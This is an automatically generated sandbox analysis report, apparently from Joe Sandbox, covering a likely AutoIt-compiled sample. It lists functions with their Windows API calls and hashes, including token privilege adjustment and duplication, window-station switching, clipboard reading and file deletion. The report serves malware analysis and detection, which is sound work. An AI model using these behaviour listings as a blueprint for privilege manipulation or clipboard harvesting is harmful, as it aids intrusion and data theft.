                                                    • Instruction ID: e39e262403306dde2b75ab85c4fd5a8378355b0b1aba67f3f14af4b918a7ef2c
                                                    • Opcode Fuzzy Hash: 18976368c5092bc0507677532f350141054a1e31ebca050135fe9fc43c84bf58
                                                    • Instruction Fuzzy Hash: DCF08CB2640701CFCB348F24D484816BBF0AF84329310892EE2D683650C735A984FB04
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.4002484163.0000000000EF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EF0000, based on PE: true
                                                    • Associated: 0000000B.00000002.4002458922.0000000000EF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000F80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000FA6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002665793.0000000000FB0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002697933.0000000000FB9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_ef0000_Organizational.jbxd
                                                    Similarity
                                                    • API ID: __fread_nolock
                                                    • String ID:
                                                    • API String ID: 2638373210-0
                                                    • Opcode ID: 1a81c16e28573863898c67bef1386d759a1651ff521f05548b9e3597368886a1
                                                    • Instruction ID: 4cdf51e513a056ff94efd697b60c725f9cd39c1b57361dd8a5bd6047572c5355
                                                    • Opcode Fuzzy Hash: 1a81c16e28573863898c67bef1386d759a1651ff521f05548b9e3597368886a1
                                                    • Instruction Fuzzy Hash: D2F0587240020DFFDF04DF80C941EAABB79FB04324F208189FD198A252D336EA61EB90
                                                    APIs
                                                    • GetLongPathNameW.KERNEL32(?,?,00007FFF), ref: 00F109E4
                                                      • Part of subcall function 00F01821: _memmove.LIBCMT ref: 00F0185B
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.4002484163.0000000000EF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EF0000, based on PE: true
                                                    • Associated: 0000000B.00000002.4002458922.0000000000EF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000F80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000FA6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002665793.0000000000FB0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002697933.0000000000FB9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_ef0000_Organizational.jbxd
                                                    Similarity
                                                    • API ID: LongNamePath_memmove
                                                    • String ID:
                                                    • API String ID: 2514874351-0
                                                    • Opcode ID: 7cefa9c0bb71acdc864ed8f030be8f9d609d39e2e522f8456cec8abce90b3dbe
                                                    • Instruction ID: 7ca023a5bdfb18f6fad8d9be14c6a4d238b6715c7d381c4889382a8c3185f8e0
                                                    • Opcode Fuzzy Hash: 7cefa9c0bb71acdc864ed8f030be8f9d609d39e2e522f8456cec8abce90b3dbe
                                                    • Instruction Fuzzy Hash: 1EE0863290012857C72196989C05FEA77EDEB89790F0441B6FC08D7254D9649D859691
                                                    APIs
                                                    • SHGetFolderPathW.SHELL32(00000000,?,00000000,00000000,?), ref: 00F54D31
                                                      • Part of subcall function 00F01821: _memmove.LIBCMT ref: 00F0185B
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.4002484163.0000000000EF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EF0000, based on PE: true
                                                    • Associated: 0000000B.00000002.4002458922.0000000000EF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000F80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000FA6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002665793.0000000000FB0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002697933.0000000000FB9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_ef0000_Organizational.jbxd
                                                    Similarity
                                                    • API ID: FolderPath_memmove
                                                    • String ID:
                                                    • API String ID: 3334745507-0
                                                    • Opcode ID: c531aa9ef501e09df578d417ee7c1d7ddff870d480766c2813926756ff2c824b
                                                    • Instruction ID: 5ceed74525c67dbab03002c964fc446734a0ff2b01082fe734f494ac9e7ad75a
                                                    • Opcode Fuzzy Hash: c531aa9ef501e09df578d417ee7c1d7ddff870d480766c2813926756ff2c824b
                                                    • Instruction Fuzzy Hash: E3D05EB190032C2BDB60E6A49C0DDF77BACE744220F0006A1BC5CD3142ED249D4586E0
                                                    APIs
                                                      • Part of subcall function 00F5384C: SetFilePointerEx.KERNEL32(00000000,?,?,00000000,00000001,00000000,00000000,00F53959,00000000,00000000,?,00F405DB,00FA8070,00000002,?,?), ref: 00F538CA
                                                    • WriteFile.KERNEL32(00000000,?,?,?,00000000,00000000,00000000,?,00F405DB,00FA8070,00000002,?,?,?,00000000), ref: 00F53967
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.4002484163.0000000000EF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EF0000, based on PE: true
                                                    • Associated: 0000000B.00000002.4002458922.0000000000EF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000F80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000FA6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002665793.0000000000FB0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002697933.0000000000FB9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_ef0000_Organizational.jbxd
                                                    Similarity
                                                    • API ID: File$PointerWrite
                                                    • String ID:
                                                    • API String ID: 539440098-0
                                                    • Opcode ID: 1fb73c2231cd377ba9472bf4dafa2877951cd6c5f7ab3b0720cea0f7338763c2
                                                    • Instruction ID: acba2e56a2767852dfb3959f809d60b3b9f58318f01d750a145eeb3915a833a4
                                                    • Opcode Fuzzy Hash: 1fb73c2231cd377ba9472bf4dafa2877951cd6c5f7ab3b0720cea0f7338763c2
                                                    • Instruction Fuzzy Hash: 66E04F36400208BBD720AF94DC05ADAB7BCEB04361F00455AFD4091111DBB29E14AB90
                                                    APIs
                                                    • CopyFileExW.KERNEL32(?,?,00000000,00000000,00000000,00000008,?,?,00F53E7D,?,?,?), ref: 00F53F0D
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.4002484163.0000000000EF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EF0000, based on PE: true
                                                    • Associated: 0000000B.00000002.4002458922.0000000000EF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000F80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000FA6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002665793.0000000000FB0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002697933.0000000000FB9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_ef0000_Organizational.jbxd
                                                    Similarity
                                                    • API ID: CopyFile
                                                    • String ID:
                                                    • API String ID: 1304948518-0
                                                    • Opcode ID: 23454085e1d2a7bb3ad66cab5c65972741c8b4fd50c9ca8c157505be02049cd9
                                                    • Instruction ID: 35ad37f255996fae9da06bf3860f5d64744b1e85445bf470abdb1c72087a126e
                                                    • Opcode Fuzzy Hash: 23454085e1d2a7bb3ad66cab5c65972741c8b4fd50c9ca8c157505be02049cd9
                                                    • Instruction Fuzzy Hash: 3BD0A7315E020CBBEF50DFA0CC06FB8B7ACEB01706F1002A4B504D90E0DAB269189795
                                                    APIs
                                                    • SetFilePointerEx.KERNEL32(00000000,00000000,00000000,00000000,00000001,00000000,00000000,?,00F406E6,00000000,00000000,00000000), ref: 00F042BF
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.4002484163.0000000000EF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EF0000, based on PE: true
                                                    • Associated: 0000000B.00000002.4002458922.0000000000EF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000F80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000FA6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002665793.0000000000FB0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002697933.0000000000FB9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_ef0000_Organizational.jbxd
                                                    Similarity
                                                    • API ID: FilePointer
                                                    • String ID:
                                                    • API String ID: 973152223-0
                                                    • Opcode ID: e8bf1c771d4caedb7632a8906a0d7b3805daddcfc29d36e1e4ffec36ddea4f69
                                                    • Instruction ID: d810a4108206d72b207052d182d80851476628ee799e175c3375a641cdbc951d
                                                    • Opcode Fuzzy Hash: e8bf1c771d4caedb7632a8906a0d7b3805daddcfc29d36e1e4ffec36ddea4f69
                                                    • Instruction Fuzzy Hash: 59D0C77464020CBFE710CB80DC46FA9777CE705710F500194FD0466290D6B27D549795
                                                    APIs
                                                    • GetFileAttributesW.KERNEL32(?,00F53BFE), ref: 00F54FED
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.4002484163.0000000000EF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EF0000, based on PE: true
                                                    • Associated: 0000000B.00000002.4002458922.0000000000EF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000F80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000FA6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002665793.0000000000FB0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002697933.0000000000FB9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_ef0000_Organizational.jbxd
                                                    Similarity
                                                    • API ID: AttributesFile
                                                    • String ID:
                                                    • API String ID: 3188754299-0
                                                    • Opcode ID: b85523d086a90e09ad20e0fe4af520a0c7d516aecbe28c13e67900748798bf09
                                                    • Instruction ID: 1e4a7fbad85acd242d35c9474a56ea41d6183e9b4cccb4b575734af0f37789ee
                                                    • Opcode Fuzzy Hash: b85523d086a90e09ad20e0fe4af520a0c7d516aecbe28c13e67900748798bf09
                                                    • Instruction Fuzzy Hash: A0B09234400A80769D681E3C194C4A9338159423BE7D81B81E978864E59639A88FB760
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.4002484163.0000000000EF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EF0000, based on PE: true
                                                    • Associated: 0000000B.00000002.4002458922.0000000000EF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000F80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000FA6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002665793.0000000000FB0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002697933.0000000000FB9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_ef0000_Organizational.jbxd
                                                    Similarity
                                                    • API ID: __wfsopen
                                                    • String ID:
                                                    • API String ID: 197181222-0
                                                    • Opcode ID: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
                                                    • Instruction ID: affe16d52ca62683a70e950ed84eaa798cb443941b029d7f10983d6f3a61d3da
                                                    • Opcode Fuzzy Hash: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
                                                    • Instruction Fuzzy Hash: 8AB0927644020CB7CE012A82EC13A993B299B84A68F408020FB0C1C162A677A6A0A689
                                                    APIs
                                                    • GetLastError.KERNEL32(00000002,00000000), ref: 00F5D842
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.4002484163.0000000000EF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EF0000, based on PE: true
                                                    • Associated: 0000000B.00000002.4002458922.0000000000EF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000F80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000FA6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002665793.0000000000FB0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002697933.0000000000FB9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_ef0000_Organizational.jbxd
                                                    Similarity
                                                    • API ID: ErrorLast
                                                    • String ID:
                                                    • API String ID: 1452528299-0
                                                    • Opcode ID: f3c5e359e0533a5df9a2e7505b3d0cbd4390031e701433ce72bb7d9e552e6cf3
                                                    • Instruction ID: 928b65a3c67ef6a260591b01a2b1ea45966f0790ecb133b7aa96b6542d6f91d6
                                                    • Opcode Fuzzy Hash: f3c5e359e0533a5df9a2e7505b3d0cbd4390031e701433ce72bb7d9e552e6cf3
                                                    • Instruction Fuzzy Hash: 937192706053018FC724EF64D891A6EB7E0BF88355F04462CFA96972A2DB34ED49EB52
                                                    APIs
                                                      • Part of subcall function 00F54005: FindFirstFileW.KERNEL32(?,?), ref: 00F5407C
                                                      • Part of subcall function 00F54005: DeleteFileW.KERNEL32(?,?,?,?), ref: 00F540CC
                                                      • Part of subcall function 00F54005: FindNextFileW.KERNELBASE(00000000,00000010), ref: 00F540DD
                                                      • Part of subcall function 00F54005: FindClose.KERNEL32(00000000), ref: 00F540F4
                                                    • GetLastError.KERNEL32 ref: 00F5C292
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.4002484163.0000000000EF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EF0000, based on PE: true
                                                    • Associated: 0000000B.00000002.4002458922.0000000000EF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000F80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000FA6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002665793.0000000000FB0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002697933.0000000000FB9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_ef0000_Organizational.jbxd
                                                    Similarity
                                                    • API ID: FileFind$CloseDeleteErrorFirstLastNext
                                                    • String ID:
                                                    • API String ID: 2191629493-0
                                                    • Opcode ID: 0d68d892dbe2e93e8b3c3764b46744038ce16b2b71483840b18bc7ef11d5d08d
                                                    • Instruction ID: 1ed9b6529c868118a94725ee78e891e80e0f49b747bfde34bfd0bf359d3b4382
                                                    • Opcode Fuzzy Hash: 0d68d892dbe2e93e8b3c3764b46744038ce16b2b71483840b18bc7ef11d5d08d
                                                    • Instruction Fuzzy Hash: 57F0A0323102148FCB10EF59D840F6AB7E5AF88320F05C019FA0A9B392CB74BC05DB94
                                                    APIs
                                                    • CloseHandle.KERNEL32(?,?,00000000,00F32F8B), ref: 00F042EF
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.4002484163.0000000000EF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EF0000, based on PE: true
                                                    • Associated: 0000000B.00000002.4002458922.0000000000EF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000F80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000FA6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002665793.0000000000FB0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002697933.0000000000FB9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_ef0000_Organizational.jbxd
                                                    Similarity
                                                    • API ID: CloseHandle
                                                    • String ID:
                                                    • API String ID: 2962429428-0
                                                    • Opcode ID: fd47a72ca1896635f3405faf46cdd73c5cfec1b359eb82a34d328910a293c8a8
                                                    • Instruction ID: c5bb18dc3badd2b47bf965e0a5b9d1a34925f0c819709cccae1c7dcb53cbd2b4
                                                    • Opcode Fuzzy Hash: fd47a72ca1896635f3405faf46cdd73c5cfec1b359eb82a34d328910a293c8a8
                                                    • Instruction Fuzzy Hash: 2DE0BFB5500701CFC3314F1AD804451F7F4FFD13713214A2EE1E6925A0D7B06499EB50
                                                    APIs
                                                      • Part of subcall function 00EF29E2: GetWindowLongW.USER32(?,000000EB), ref: 00EF29F3
                                                    • DefDlgProcW.USER32(?,0000004E,?,?,?,?,?,?), ref: 00F7D208
                                                    • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 00F7D249
                                                    • GetWindowLongW.USER32(FFFFFDD9,000000F0), ref: 00F7D28E
                                                    • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00F7D2B8
                                                    • SendMessageW.USER32 ref: 00F7D2E1
                                                    • _wcsncpy.LIBCMT ref: 00F7D359
                                                    • GetKeyState.USER32(00000011), ref: 00F7D37A
                                                    • GetKeyState.USER32(00000009), ref: 00F7D387
                                                    • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 00F7D39D
                                                    • GetKeyState.USER32(00000010), ref: 00F7D3A7
                                                    • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00F7D3D0
                                                    • SendMessageW.USER32 ref: 00F7D3F7
                                                    • SendMessageW.USER32(?,00001030,?,00F7B9BA), ref: 00F7D4FD
                                                    • ImageList_SetDragCursorImage.COMCTL32(00000000,00000000,00000000,?,?,?), ref: 00F7D513
                                                    • ImageList_BeginDrag.COMCTL32(00000000,000000F8,000000F0), ref: 00F7D526
                                                    • SetCapture.USER32(?), ref: 00F7D52F
                                                    • ClientToScreen.USER32(?,?), ref: 00F7D594
                                                    • ImageList_DragEnter.COMCTL32(00000000,?,?), ref: 00F7D5A1
                                                    • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 00F7D5BB
                                                    • ReleaseCapture.USER32 ref: 00F7D5C6
                                                    • GetCursorPos.USER32(?), ref: 00F7D600
                                                    • ScreenToClient.USER32(?,?), ref: 00F7D60D
                                                    • SendMessageW.USER32(?,00001012,00000000,?), ref: 00F7D669
                                                    • SendMessageW.USER32 ref: 00F7D697
                                                    • SendMessageW.USER32(?,00001111,00000000,?), ref: 00F7D6D4
                                                    • SendMessageW.USER32 ref: 00F7D703
                                                    • SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 00F7D724
                                                    • SendMessageW.USER32(?,0000110B,00000009,?), ref: 00F7D733
                                                    • GetCursorPos.USER32(?), ref: 00F7D753
                                                    • ScreenToClient.USER32(?,?), ref: 00F7D760
                                                    • GetParent.USER32(?), ref: 00F7D780
                                                    • SendMessageW.USER32(?,00001012,00000000,?), ref: 00F7D7E9
                                                    • SendMessageW.USER32 ref: 00F7D81A
                                                    • ClientToScreen.USER32(?,?), ref: 00F7D878
                                                    • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 00F7D8A8
                                                    • SendMessageW.USER32(?,00001111,00000000,?), ref: 00F7D8D2
                                                    • SendMessageW.USER32 ref: 00F7D8F5
                                                    • ClientToScreen.USER32(?,?), ref: 00F7D947
                                                    • TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 00F7D97B
                                                      • Part of subcall function 00EF29AB: GetWindowLongW.USER32(?,000000EB), ref: 00EF29BC
                                                    • GetWindowLongW.USER32(?,000000F0), ref: 00F7DA17
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.4002484163.0000000000EF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EF0000, based on PE: true
                                                    • Associated: 0000000B.00000002.4002458922.0000000000EF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000F80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000FA6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002665793.0000000000FB0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002697933.0000000000FB9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_ef0000_Organizational.jbxd
                                                    Similarity
                                                    • API ID: MessageSend$ClientScreen$ImageLongWindow$CursorDragList_State$CaptureMenuPopupTrack$BeginEnterInvalidateParentProcRectRelease_wcsncpy
                                                    • String ID: @GUI_DRAGID$F
                                                    • API String ID: 3977979337-4164748364
                                                    • Opcode ID: 14f47706f492804ee96336561c2fd4f64e80c39b0352761dacbb8fb2e31ce196
                                                    • Instruction ID: d6fdb238051cd096cad6814fac9cb13fe9142c318a186f2f198849cb5792d079
                                                    • Opcode Fuzzy Hash: 14f47706f492804ee96336561c2fd4f64e80c39b0352761dacbb8fb2e31ce196
                                                    • Instruction Fuzzy Hash: 97429E306053459FD724DF24C884BAABBF5FF88320F94461AF699872A1CBB1D854EF52
                                                    APIs
                                                      • Part of subcall function 00F49399: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00F493E3
                                                      • Part of subcall function 00F49399: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00F49410
                                                      • Part of subcall function 00F49399: GetLastError.KERNEL32 ref: 00F4941D
                                                    • _memset.LIBCMT ref: 00F48F71
                                                    • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?,?,?,?,00000001,?,?), ref: 00F48FC3
                                                    • CloseHandle.KERNEL32(?), ref: 00F48FD4
                                                    • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 00F48FEB
                                                    • GetProcessWindowStation.USER32 ref: 00F49004
                                                    • SetProcessWindowStation.USER32(00000000), ref: 00F4900E
                                                    • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 00F49028
                                                      • Part of subcall function 00F48DE9: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00F48F27), ref: 00F48DFE
                                                      • Part of subcall function 00F48DE9: CloseHandle.KERNEL32(?,?,00F48F27), ref: 00F48E10
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.4002484163.0000000000EF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EF0000, based on PE: true
                                                    • Associated: 0000000B.00000002.4002458922.0000000000EF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000F80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000FA6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002665793.0000000000FB0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002697933.0000000000FB9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_ef0000_Organizational.jbxd
                                                    Similarity
                                                    • API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLookupPrivilegeValue_memset
                                                    • String ID: $default$winsta0
                                                    • API String ID: 2063423040-1027155976
                                                    • Opcode ID: afe9e0435f90ced5ddaa41537f5cf6705fa46ce913d0fffa941fcc09c55b219f
                                                    • Instruction ID: 8df0a57800d8b9b6475ec57f9e6c9804eb6ba684ed18748506a9cf1661e6550a
                                                    • Opcode Fuzzy Hash: afe9e0435f90ced5ddaa41537f5cf6705fa46ce913d0fffa941fcc09c55b219f
                                                    • Instruction Fuzzy Hash: C88148B1E0420DBFEF119FA4CC49AEE7B79AF44364F044119FD10A6261DB758E19EB20
                                                    APIs
                                                    • OpenClipboard.USER32(00F80980), ref: 00F6465C
                                                    • IsClipboardFormatAvailable.USER32(0000000D), ref: 00F6466A
                                                    • GetClipboardData.USER32(0000000D), ref: 00F64672
                                                    • CloseClipboard.USER32 ref: 00F6467E
                                                    • GlobalLock.KERNEL32(00000000), ref: 00F6469A
                                                    • CloseClipboard.USER32 ref: 00F646A4
                                                    • GlobalUnlock.KERNEL32(00000000), ref: 00F646B9
                                                    • IsClipboardFormatAvailable.USER32(00000001), ref: 00F646C6
                                                    • GetClipboardData.USER32(00000001), ref: 00F646CE
                                                    • GlobalLock.KERNEL32(00000000), ref: 00F646DB
                                                    • GlobalUnlock.KERNEL32(00000000), ref: 00F6470F
                                                    • CloseClipboard.USER32 ref: 00F6481F
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.4002484163.0000000000EF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EF0000, based on PE: true
                                                    • Associated: 0000000B.00000002.4002458922.0000000000EF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000F80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000FA6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002665793.0000000000FB0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002697933.0000000000FB9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_ef0000_Organizational.jbxd
                                                    Similarity
                                                    • API ID: Clipboard$Global$Close$AvailableDataFormatLockUnlock$Open
                                                    • String ID:
                                                    • API String ID: 3222323430-0
                                                    • Opcode ID: 2a774dcc0fd6088b799f47c3d77f20bd7f4e45611db41a618601e192444439a8
                                                    • Instruction ID: 02fba72946602c5b6b5f0e7f069ba994bdc3416b1455663170797dfb679b49f2
                                                    • Opcode Fuzzy Hash: 2a774dcc0fd6088b799f47c3d77f20bd7f4e45611db41a618601e192444439a8
                                                    • Instruction Fuzzy Hash: 1E51A372244205ABD340FF60DC89FBE77A8AF84B10F404529F546D31E2EF71E908AB62
                                                    APIs
                                                    • FindFirstFileW.KERNEL32(?,?), ref: 00F5CDD0
                                                    • FindClose.KERNEL32(00000000), ref: 00F5CE24
                                                    • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00F5CE49
                                                    • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00F5CE60
                                                    • FileTimeToSystemTime.KERNEL32(?,?), ref: 00F5CE87
                                                    • __swprintf.LIBCMT ref: 00F5CED3
                                                    • __swprintf.LIBCMT ref: 00F5CF16
                                                      • Part of subcall function 00F01A36: _memmove.LIBCMT ref: 00F01A77
                                                    • __swprintf.LIBCMT ref: 00F5CF6A
                                                      • Part of subcall function 00F138C8: __woutput_l.LIBCMT ref: 00F13921
                                                    • __swprintf.LIBCMT ref: 00F5CFB8
                                                      • Part of subcall function 00F138C8: __flsbuf.LIBCMT ref: 00F13943
                                                      • Part of subcall function 00F138C8: __flsbuf.LIBCMT ref: 00F1395B
                                                    • __swprintf.LIBCMT ref: 00F5D007
                                                    • __swprintf.LIBCMT ref: 00F5D056
                                                    • __swprintf.LIBCMT ref: 00F5D0A5
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.4002484163.0000000000EF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EF0000, based on PE: true
                                                    • Associated: 0000000B.00000002.4002458922.0000000000EF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000F80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000FA6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002665793.0000000000FB0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002697933.0000000000FB9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_ef0000_Organizational.jbxd
                                                    Similarity
